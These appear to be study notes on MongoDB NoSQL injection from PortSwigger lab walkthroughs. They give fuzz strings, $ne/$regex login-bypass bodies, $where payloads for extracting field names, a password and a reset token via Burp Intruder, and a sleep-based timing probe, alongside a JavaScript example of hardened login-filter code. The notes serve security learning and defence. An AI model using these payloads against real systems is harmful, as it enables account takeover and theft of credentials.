Submit a fuzz string as the value of a JSON POST body field or a GET URL parameter.
Payload example strings for MongoDB:
'
''
"
""
\'
'"`{
;$Foo}
$Foo \xYZ
'\"`{\r;$Foo}\n$Foo \\xYZ\u0000.
' && 0 && 'x
' && 1 && 'x
'fizzy'||'1'=='1'
||1||
fizzy'||1||'
fizzy' && 0 && 'x
fizzy' && 1 && 'x
Determine which metacharacters are processed and which break the syntax, using true and false conditions.
A JavaScript condition payload that evaluates to true, such as:
'||'1'=='1
A null character after the category value may cause MongoDB to ignore everything that follows it:
%00
\u0000
Reveal sensitive database information with an always-true condition:
../filter?category=Gifts'||1||'
Inject query operators to manipulate NoSQL queries:
$where
$ne
$in
$regex
Use the Content Type Converter Burp extension to convert a URL-encoded POST request to JSON automatically; it changes the request body and sets the Content-Type header to application/json.
NoSQL authentication bypass using the following payload:
{
"username":{
"$ne":"invalid"
}
,"password":{
"$ne":"invalid"
}
}
NoSQL operator injection to bypass authentication:
{
"username":{
"$regex":"admin.*"
},
"password":{
"$ne":""
}
}
Send the request again. Notice that this successfully logs you in as the admin user.
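Why the two operator-injection payloads above work, and the server-side check that blocks them, as an added example written for these notes rather than taken from the lab or from any real application; buildLoginFilter and containsOperator are hypothetical helper names, and no MongoDB driver is used, the functions only return the filter a handler would pass to findOne().

```javascript
// Added example: vulnerable vs. hardened construction of a MongoDB login filter.
// The request bodies below are constructed from the payloads in these notes.

// Recursively look for keys beginning with '$' ($ne, $regex, $where, ...).
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value !== null && typeof value === 'object') {
    return Object.keys(value).some(
      (k) => k.startsWith('$') || containsOperator(value[k])
    );
  }
  return false;
}

// Vulnerable pattern: the parsed JSON body is spliced straight into the query,
// so {"username":{"$ne":"invalid"}} turns an equality match into "any user
// whose name is not 'invalid'", and the same for the password field.
function buildLoginFilterUnsafe(body) {
  return { username: body.username, password: body.password };
}

// Hardened pattern: enforce the expected scalar type for each field and refuse
// extra top-level keys (such as "$where") or nested operator objects before
// the filter is built. Anything that would change query semantics throws.
function buildLoginFilter(body) {
  if (typeof body.username !== 'string' || typeof body.password !== 'string') {
    throw new TypeError('username and password must be strings');
  }
  const allowed = ['username', 'password'];
  const extra = Object.keys(body).filter((k) => !allowed.includes(k));
  if (extra.length > 0 || containsOperator(body)) {
    throw new Error('unexpected keys or query operators in login request');
  }
  return { username: body.username, password: body.password };
}

// Constructed sample bodies: the $ne bypass and the $regex bypass from the notes.
const bypassNe = { username: { $ne: 'invalid' }, password: { $ne: 'invalid' } };
const bypassRegex = { username: { $regex: 'admin.*' }, password: { $ne: '' } };
const legit = { username: 'wiener', password: 'peter' };
```

Calling buildLoginFilterUnsafe(bypassNe) hands the operator objects to the database unchanged, while buildLoginFilter(bypassNe) and buildLoginFilter(bypassRegex) both throw before any query is issued.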
If the NoSQL query uses the $where operator, attempt to inject JavaScript functions into the query so that it returns sensitive data:
{"$where":"this.username == 'admin'"}
admin' && this.password.match(/\d/) || 'a'=='b
Identify field names by comparing the results in the responses:
admin' && this.username!='
admin' && this.foo!='
PortSwigger Lab: Exploiting NoSQL injection to extract data
Vulnerable MongoDB NoSQL database site.
URL-encode a valid JavaScript payload in the user parameter:
wiener'+'
Identify the password length of administrator:
Change the user parameter to administrator' && this.password.length < 9 || 'a'=='b and URL-encode the payload.
- Change the user parameter to administrator' && this.password[§0§]=='§a§ and make sure to URL-encode the payload.
- Set two payload positions: one for the password character position and one for the lowercase alphabet character.
- A Cluster bomb attack iterates over all combinations.
- Set payload 1 to the positions up to the maximum password length and payload 2 to the alphabet characters.
- Start the Intruder attack.
- Sort by payload position 1 and response length.
- Result, the password:
ycpxhlee
Exploiting NoSQL operator injection to extract unknown fields
Send the NoSQL password payload {"$ne":"invalid"}; the response indicates that the $ne operator has been accepted and the application is vulnerable.
Determine the length of possible hidden fields:
{
"username":"carlos",
"password":{"$ne":""},
"$where":"function(){ if(Object.keys(this)[5].length == 1) return 1; else 0;}"
}
Send to Intruder with the $where operator payload to retrieve field names from the database.
Use two payloads: the first identifies the character position number, and the second identifies the character itself.
Set the field index to 2 to identify the second field in the database, and so on:
{
"username":"carlos",
"password":{
"$ne":"invalid"
},
"$where":"Object.keys(this)[2].match('^.{§§}§§.*')"
}
NoSQL Fields identified:
[0] _id
[1] username
[2] password
[3] email
[4] passwordReset
The next Cluster bomb attack payload retrieves the value of the discovered JSON field, the password reset token:
passwordReset
"$where":"this.passwordReset.match('^.{§§}§§.*')"
The first Intruder attack obtained the field name passwordReset, and the second Intruder attack with the payload above gives the token to reset the user's password.
Browse to the target URL
/forgot-password?passwordReset=966fbc16def16921
The Cluster bomb attack identified the case-sensitive JSON field name, and then the value of the password reset token was retrieved using Intruder.
PortSwigger Lab: Exploiting NoSQL operator injection to extract unknown fields
Payload to determine vulnerability based on a time-delayed response:
{"$where": "sleep(5000)"}